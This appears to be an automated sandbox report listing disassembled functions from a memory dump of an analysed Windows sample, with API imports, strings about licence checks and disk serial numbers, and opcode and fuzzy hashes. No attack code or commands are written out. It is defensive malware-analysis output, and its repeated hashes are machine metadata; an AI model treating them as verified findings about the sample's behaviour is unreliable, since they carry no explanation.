                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: sprintf$strlen
                                                                                                                                                                                                                              • String ID: /%d:$No any serial number of harddisk got$platforms/windows/hdinfo.c
                                                                                                                                                                                                                              • API String ID: 3793847852-3769243694
                                                                                                                                                                                                                              • Opcode ID: 59de9e53130a886f42aa6e37ae8df46ae4fe5e76dfaceba1b92199ca6762f7d2
                                                                                                                                                                                                                              • Instruction ID: 5b00c2fc3694d81f5fee91143e1ca7570205236d9242b949e48701aea4136f74
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59de9e53130a886f42aa6e37ae8df46ae4fe5e76dfaceba1b92199ca6762f7d2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43315C63B1445069EB128739FC503AD2652A7CEBE6F988331CD164779CDA39CAC6D300
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A048D0 Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: fclose$freefseekmalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1339445139-0
                                                                                                                                                                                                                              • Opcode ID: 399f78aa0c4dba49522d2f96a80d116770d42eb2d2c373ff82030c6ab04f0ea7
                                                                                                                                                                                                                              • Instruction ID: 6e2eda36364707850ab6328f0d467ea891169f30167082704b23817489425ce7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 399f78aa0c4dba49522d2f96a80d116770d42eb2d2c373ff82030c6ab04f0ea7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A311E3523212150DEE95AA6B7F0236F52822FC9BE1F1856356D1E4776DFC7CB8818304
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A024C0 Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 40stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strlen$malloc
                                                                                                                                                                                                                              • String ID: %s%c%s$\$license.lic
                                                                                                                                                                                                                              • API String ID: 3157260142-3068191871
                                                                                                                                                                                                                              • Opcode ID: f96e80861704c13fdb5a2d853566ee8b58cd6d9a4597bc857ef784c32dc0ff24
                                                                                                                                                                                                                              • Instruction ID: 1d9808d079d8fd016725643f0e02b6a216e5cb435c001367e781449633a5337c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f96e80861704c13fdb5a2d853566ee8b58cd6d9a4597bc857ef784c32dc0ff24
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46F0BB167553584DED119B13BE1139D97D45F89BE4F8C42345E0E07768FE3CE5868704
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A31BF0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: N != NULL$src/math/rand_prime.c
                                                                                                                                                                                                                              • API String ID: 0-3192267683
                                                                                                                                                                                                                              • Opcode ID: 88fb009ebd091988d3dae9954aaefb5b86711a927472e8c500d3e802c12fc70b
                                                                                                                                                                                                                              • Instruction ID: 84ccb0d70d20d6a5081f6c6e4808afc1e0e61ad4c370b9b038aab8d37bddc339
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88fb009ebd091988d3dae9954aaefb5b86711a927472e8c500d3e802c12fc70b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38315B3230425586E7119B16FC0075EAB64F78ABD8FC46626ED0A47B6CDB3CC582C700
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A947B0 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32 ref: 70A947F5
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 70A94800
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 70A94809
                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 70A94811
                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32 ref: 70A9481E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1445889803-0
                                                                                                                                                                                                                              • Opcode ID: 0d0f0ff819954a875514007bfb7f62db57373694f9da8c0c7305670088106c20
                                                                                                                                                                                                                              • Instruction ID: 947787567f8c69f8023b727cfb0599b926066b1319473d29c916a36b1e41b67f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d0f0ff819954a875514007bfb7f62db57373694f9da8c0c7305670088106c20
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB11CE26B29B1186FB108B21F80431A73A0B7487B1F080730DE9D43BA8DF3CE9868704
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A024D6 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 26stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strlen$malloc
                                                                                                                                                                                                                              • String ID: %s%c%s$\
                                                                                                                                                                                                                              • API String ID: 3157260142-3534329225
                                                                                                                                                                                                                              • Opcode ID: c6ededf5cf47ba878fb207bf3dfe42d717b0012f537b9bf285e786ee4e14eeb6
                                                                                                                                                                                                                              • Instruction ID: 0367f229ae99b81b0a6aece66945920474d20773ad1b95e8e2479e57347c3555
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6ededf5cf47ba878fb207bf3dfe42d717b0012f537b9bf285e786ee4e14eeb6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DE0D8217513584DDD15DB02BE1125DA2C45F89BD8F8C42345D4E13B68EE3CF1898704
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A731C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 233fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: abortfwrite
                                                                                                                                                                                                                              • String ID: '$illegal index register
                                                                                                                                                                                                                              • API String ID: 1067672060-451399654
                                                                                                                                                                                                                              • Opcode ID: bf3b4d5a6895bfc15693ebbcf9724a5dc202c1023911f9994f8ac20c5719f471
                                                                                                                                                                                                                              • Instruction ID: cacedb8648d7b281e9312319fb0b0f8ed00e1b69f33153c60057bcc3b813dd02
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf3b4d5a6895bfc15693ebbcf9724a5dc202c1023911f9994f8ac20c5719f471
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99917E73619B85C4DB138F3DE890A4C3F69E399F88BAAD112CA4D47719CA7EC856C311
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A0F8C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 109COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • This function could not be called from the plain script, xrefs: 70A0FA58
                                                                                                                                                                                                                              • Invalid license, xrefs: 70A0FA37
                                                                                                                                                                                                                              • Internal buffer error, xrefs: 70A0FA87
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _time64
                                                                                                                                                                                                                              • String ID: Internal buffer error$Invalid license$This function could not be called from the plain script
                                                                                                                                                                                                                              • API String ID: 1670930206-992726897
                                                                                                                                                                                                                              • Opcode ID: d6178d2ae9458ee3749eafab86c5a220bc802af60c78e95801f32036c88ffdbe
                                                                                                                                                                                                                              • Instruction ID: ee142d018761b821e03acacf35cfb2c58d9a39297a34223c3155ec6321799396
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6178d2ae9458ee3749eafab86c5a220bc802af60c78e95801f32036c88ffdbe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B418E32A09A0AD5EB118B25FC903596364F7D8BD4F544B22C94F97B28EB3CE585C201
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A21D90 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • platforms/windows/hdinfo.c, xrefs: 70A21DD0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                                              • String ID: platforms/windows/hdinfo.c
                                                                                                                                                                                                                              • API String ID: 1365068426-3843089204
                                                                                                                                                                                                                              • Opcode ID: 9c56765c441c032a34380b85473fef97e151c7b6c59a7541bf5aae5b2dc5d622
                                                                                                                                                                                                                              • Instruction ID: 9e63ab0a01b0d31714e5dbb2f85c51bd2e6c364d4fe2559a17814d4688487de8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c56765c441c032a34380b85473fef97e151c7b6c59a7541bf5aae5b2dc5d622
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6F06D31608E41C6E710AB15E81874BB771F3C9B85F604226EE8E43B68CF7DC24A8B40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A95C40 Relevance: 6.3, APIs: 5, Instructions: 65stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 70A95C53
                                                                                                                                                                                                                              • malloc.MSVCRT(?,?,?,?,?,?,70A037BC), ref: 70A95C5D
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 70A95C68
                                                                                                                                                                                                                              • malloc.MSVCRT(?,?,?,?,?,?,70A037BC), ref: 70A95C72
                                                                                                                                                                                                                              • free.MSVCRT(?,?,?,?,?,?,70A037BC), ref: 70A95CE9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: mallocstrlen$free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2585366504-0
                                                                                                                                                                                                                              • Opcode ID: f4e204fc3767174a440119a21deb6e416b8aab9a5dacfd59637b35435b90f805
                                                                                                                                                                                                                              • Instruction ID: 459a2d69420cea9e067466f8c926e3f8a872acc6e40a5636b6d64072ef7dd5a7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4e204fc3767174a440119a21deb6e416b8aab9a5dacfd59637b35435b90f805
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A1138127346A846CB199F32A5735AD7BE0DF4FFC4F948126FE8B47718EA289111C708
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A01010 Relevance: 6.1, APIs: 4, Instructions: 131sleepCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
